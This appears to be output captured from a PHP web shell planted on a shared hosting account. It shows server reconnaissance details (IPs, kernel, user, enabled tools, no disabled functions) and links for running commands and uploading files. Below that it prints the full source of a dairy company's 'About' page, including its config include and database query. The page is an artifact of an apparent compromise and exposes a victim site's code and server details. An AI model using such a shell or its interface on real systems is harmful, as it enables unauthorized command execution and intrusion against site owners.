Server IP : 103.53.40.154 / Your IP : 3.137.169.56 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/milkodelight.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include "admin/config.php"; $sqlab = "SELECT * FROM `tbl_about` WHERE a_id=1"; $runab = mysqli_query($db,$sqlab) or die("Query Not run"); $datab = mysqli_fetch_assoc($runab); ?> <!doctype html> <html class="no-js" lang="zxx"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title><?php echo $datab["meta_title"];?></title> <meta name="description" content="<?php echo $datab["meta_desc"];?>"> <?php include "top-links.php";?> </head> <body> <?php include "header.php";?> <main> <!--Bredkumb Area--> <div class="bd-breadcrumb__area include__bg hero__overlay Breadcrumb__height d-flex align-items-center" data-background="assets/img/hero/breadcrumb.jpg"> <div class="container fluid"> <div class="row"> <div class="col-xl-12"> <div class="bd-breadcrumb__menu"> <nav aria-label="Breadcrumbs" class="breadcrumb-trail breadcrumbs"> <ul class="trail-items"> <li class="trail-item trail-begin"><span><a href="<?php echo $wspath?>">Home</a></span></li> <li class="trail-item trail-end"><span>About</span></li> </ul> </nav> </div> <div class="bd-breadcrumb__title"> <h2>About us</h2> </div> </div> </div> </div> </div> <section class="bd-about__area pt-60" data-background="<?php echo $wspath?>assets/img/bg/section-bg.jpg"> <div class="container"> <div class="row align-items-center"> <div class="col-lg-6"> <div class="bd-about__image-wrapper p-relative mb-60"> <img class="bd-about__image-1" src="<?php echo $wspath?>admin/images/<?php echo $datab['about_img'];?>" alt="about-img"> <div class="bd-about__image-2 text-sm-end"> <!--<img src="<?php echo $wspath?>admin/images/<?php echo $datab['about_img'];?>" alt="about-img">--> </div> <!--<div class="bd-about__shape">--> <!-- <img src="assets/img/about/about-cow.png" alt="about-cow-icon">--> <!-- <img class="bd-about__dashed-icon" src="assets/img/about/about-dashed.png" alt="about-dashed">--> <!--</div> --> </div> </div> <div class="col-lg-6"> <div class="bd-about__content-wrapper mb-60"> <div class="bd-section__title-wrapper mb-40"> <span class="bd-sub__title">About Us</span> <h2 class="bd-section__title mb-30">Milko Delight Foods Private Limited</h2> <p class="bd-section__paragraph"><?php echo substr($datab['about_desc'],0,265);?><br>...</p> </div> <div class="bd-about__features-wrapper mb-25"> <div class="bd-about__features"> <div class="bd-about__features-title"> <h4>Our Mission</h4> </div> <div class="bd-about__features-list"> <ul> <li> <div class="features__icon"> <i class="fa-regular fa-check"></i> </div> <div class="features__list-title"> High-quality work </div> </li> <li> <div class="features__icon"> <i class="fa-regular fa-check"></i> </div> <div class="features__list-title"> Straightforward pricing </div> </li> <li> <div class="features__icon"> <i class="fa-regular fa-check"></i> </div> <div class="features__list-title"> Rapid response times </div> </li> </ul> </div> </div> <!--<div class="bd-about__experience text-center">--> <!-- <span class="number counter">21+</span><span class="plus" >+</span>--> <!-- <p>Years experience</p>--> <!--</div>--> </div> <!--<a class="bd-theme__btn-1" href="#">get in touch</a>--> </div> </div> </div> </div> </section> <section id="ceo-msg"> <div class="container"> <div class="row"> <div class="col-lg-6 py-4"> <div class="ceo-msg"> <h3>Message From CEO:</h3> <p> Welcome to Milko Delight Foods Private Limited! Since 2002, we've been dedicated to providing high-quality milk products to homes and businesses in India and beyond. Our range includes milk powder, ghee, butter, curd, and rice, all made with the finest ingredients. </p> <p>As CEO, I am proud of the commitment and professionalism of our team. We are committed to continuing to innovate and evolve, always striving to exceed your expectations.</p> <p>Thank you for choosing Milko Delight. We look forward to serving you for many years to come.</p> <p>Sincerely, <br> Fatheiyab Chaudhary <br> CEO, Milko Delight Foods Private Limited</p> </div> </div> <div class="col-lg-6 py-4"> <div class="ceo-img"> <img width="100%" src=" <?php echo $wspath?>assets/images/milk-father.jpg"> </div> </div> <div class="col-lg-6 py-4"> <div class="ceo-img"> <img width="100%" src=" <?php echo $wspath?>assets/images/milk-son.jpg"> </div> </div> <div class="col-lg-6 py-4"> <div class="ceo-msg"> <h4>Message From CEO:</h4> <p> Welcome to Milko Delight Foods Private Limited! Since 2002, we've been dedicated to providing high-quality milk products to homes and businesses in India and beyond. Our range includes milk powder, ghee, butter, curd, and rice, all made with the finest ingredients. </p> <p>As Vice CEO of Milko Delight Foods Private Limited, I am proud to be part of a company dedicated to delivering high-quality milk products since 2002.</p> <p>Thank you for choosing Milko Delight. We look forward to serving you for many years to come.</p> <p>Sincerely, <br> Nazar Chaudhary <br> Vice CEO, Milko Delight Foods Private Limited</p> </div> </div> </div> </div> </section> <?php include "footer.php";?> </body> </html>